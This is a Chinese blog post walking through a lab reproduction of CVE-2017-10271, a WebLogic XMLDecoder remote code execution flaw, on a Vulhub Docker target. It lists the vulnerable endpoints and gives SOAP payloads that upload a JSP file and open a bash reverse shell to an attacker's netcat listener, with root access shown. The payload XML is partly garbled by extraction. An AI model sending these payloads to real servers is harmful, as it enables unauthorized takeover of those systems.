CVE-2017-10271复现

最新推荐文章于 2024-04-30 17:52:05 发布
最新推荐文章于 2024-04-30 17:52:05 发布
阅读量2.9k 收藏
点赞数
文章标签: docker web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56258713/article/details/125586978
版权

一、漏洞解析
漏洞本质是由于wls组件使用了webservice来请求soap请求,所以构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令。SOAP是web服务安全性内置协议,采用保密和身份验证规则集的方式。
二、环境
1、docker
2、Vulhub-master
3、Burpsuite、netcat
三、复现
1、打开docker #docker -v查看
2、安装docker-compose #yum install docker-compose
3、 到 https://github.com/vulhub/vulhub 下载vulhub的源码包,然后上传到靶机中。执行:
unzip vulhub-master.zip #解压zip
cd到解压目录下: #cd vulhub-master
注意:centos7使用unzip解压时,有可能解压不了,报错:Archive: vulhub-master.zip End-of-central-directory signature not found

解决办法:使用命令安装jar工具:yum -y install java-1.6.0-openjdk-devel
之后使用解压命令:jar xvf 要解压的文件名在这里插入图片描述

4、进入到CVE-2017-10271,执行以下命令:
docker-master build
docker-master up -d
 如果出现ERROR: Get https://registry-1.docker.io/v2/: dial tcp: lookup registry-1.doc问题,重启就完了。
在这里插入图片描述

5、执行docker ps查看是否开启成功
在这里插入图片描述

6、访问http://ip:7001 ,如果出现这个页面说明环境启动成功
在这里插入图片描述

7、访问http://靶机ip:7001//wls-wsat/CoordinatorPortType ,如果出现这个页面说明可能存在漏洞:
在这里插入图片描述

其它可用URL:
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
8、使用burp来验证
访问http://靶机ip:7001//wls-wsat/CoordinatorPortType,抓包,将GET改为POST,然后插入构造的soap POC:
①上传
<soapenv:Envelope xmlns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/”>
soapenv:Header
<work:WorkContext xmlns:work=“http://bea.com/2004/06/soap/workarea/”>


servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp


<![CDATA[ <% out.print("test"); %> ]]>




</work:WorkContext>
</soapenv:Header>
soapenv:Body/
</soapenv:Envelope>
在这里插入图片描述

注意:报错415,需要修改Content-Type:text/xml;charset=utf-8
修改后,点击发送,上传成功:
在这里插入图片描述

②反弹shell
<soapenv:Envelope xmlns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/”>
soapenv:Header
<work:WorkContext xmlns:work=“http://bea.com/2004/06/soap/workarea/”>




/bin/bash


-c


bash -i >& /dev/tcp/192.168.3.125/21 0>&1
#/dev/tcp/监听机的ip/监听的端口




</work:WorkContext>
</soapenv:Header>
soapenv:Body/
</soapenv:Envelope>
攻击机监听:nc -lnvp 21

构造poc然后发送,反弹shell成功,执行命令id返回root:
在这里插入图片描述
在这里插入图片描述

怡宝也很甜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2017-10271(JAVA XMLDecoder反序列化专用工具).zip
06-22
测试专用
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271
huangyongkang666的博客
07-25 1212
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271
CVE-2017-12615-master.zip
09-04
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
Weblogic反序列化漏洞(CVE-2017-10271
weixin_46411728的博客
11-14 1486
Weblogic反序列化漏洞(CVE-2017-10271
CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞
weixin_45694388的博客
07-09 5159
漏洞产生原因: CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 涉及版本: 10.3.6.0.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0 环境搭建: vulhub 工具利用: 检测: 工具:weblogicScanner
Weblogic、CVE-2017-10271
01-03
weblogic打补丁操作步骤 主义更换路径!攻击者针对WebLogicWLS组件中存在的CVE-2017-10271远程代码执行漏洞,构造请求对运行的WebLogic中间件主机进行攻击,由于该漏洞利用方式简单,且能够直接获取目标服务器的控制权限,影响范围较广,近期发现此漏洞的利用方式为传播虚拟币挖矿程序,不排除会被黑客用于其他目的的攻击。
Weblogic(CVE-2017-10271)的漏洞复现
陈瘦瘦的迪迦的博客
08-05 1188
Weblogic(CVE-2017-10271)漏洞复现 漏洞形成原因 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 漏洞如何利用 利用服务器的XMLDecoder可以解析XML数据这一特性,可以构造XML语句,上传一句话木马,getshell。 漏洞复现过程 Kali docker 容器中启动此漏洞环境 浏览器访问 Kali 的 ip 地址并接上
CVE-2017-10271漏洞复现
qq_36594628的博客
07-27 4875
CVE-2017-10271复现 一、启动环境 ​ 靶机:ubantu20.04 IP:192.168.3.115 ​ 攻击机:win10 IP:192.168.1.238 ​ 在ubantu 20.04 搭建 Vulhub 环境中已经介绍了怎么启动环境。 二、漏洞信息 ​ WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序。 (一)、漏洞描述 ​ 在了解CVE-2017
weblogic----CVE-2017-10271漏洞复现
qq_43571759的博客
04-07 1221
CVE-2017-10271漏洞复现 漏洞描述: Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 序列化: 明明序列化那么多漏洞为什么还要序列化?因为便于传输,第一次接触到序列化是PHP的序列化,当时个人理解就是把一个对象转换成字符串进行传输,需要使用的时...
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
Weblogic反序列化漏洞补丁(FMJJ),这是一个累积补丁,代号FMJJ
WebLogic WLS远程执行漏洞(CVE-2017-10271)验证
12-18
一段小代码,WebLogic WLS远程执行漏洞(CVE-2017-10271)验证。
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。... 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -...
使用 Docker 自建一款怀旧游戏之 - 超级马里奥
Toasten
04-25 673
《 超级马里奥 》(Super Mario)是任天堂公司创造的一款经典游戏系列,是世界上最知名、最成功的游戏之一。这个系列由日本设计师宫本茂于 1985 年创造,最初的游戏名为《超级马里奥兄弟》(Super Mario Bros.),推出后风靡全球。
04 Docker练习赛从0开始到 docker 镜像提交
最新发布
TF(腾飞)开源
04-30 816
创建 Dockerfile这里 FROM 后面跟的是 baseimg 这里选择的是天池 baseimg 帖子里的第一个ADD ./ 是把当前文件夹里的文件构建到镜像的根目录下WORKDIR / 指定默认工作目录为跟目录(这里要注意指定后,需要把 run.sh 和生成的结果文件都存放在该文件夹下,否则提交会运行失败)第四句话是安装软件包,这里不需要,注释掉最后一句 CMD 就是镜像启动时执行什么命令,这里统一为 sh run.sh 不需要改动。
linux 关闭不了docker服务
zhangxu1998lq的博客
04-24 681
(如果它当前没有运行)。这就是为什么即使你停止了 Docker 服务,它仍然有可能被通过套接字激活的原因。如果你希望完全确保 Docker 服务不再运行,并且不能被套接字单元自动激活,你需要同时禁用和停止。是一个套接字单元,用于监听 Docker 的 API 请求。当这个套接字接收到请求时,它会激活。在 systemd 系统中,服务和套接字是分开管理的。先停止docker套接字。再停止docker就行了。
cve-2017-10271漏洞复现
06-28
CVE-2017-10271漏洞是Oracle WebLogic Server中的一个远程代码执行漏洞。攻击者可以通过发送特制的HTTP请求来利用该漏洞,从而在受影响的系统上执行任意代码。该漏洞已经被公开披露,并且已经有一些工具可以用来复现...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值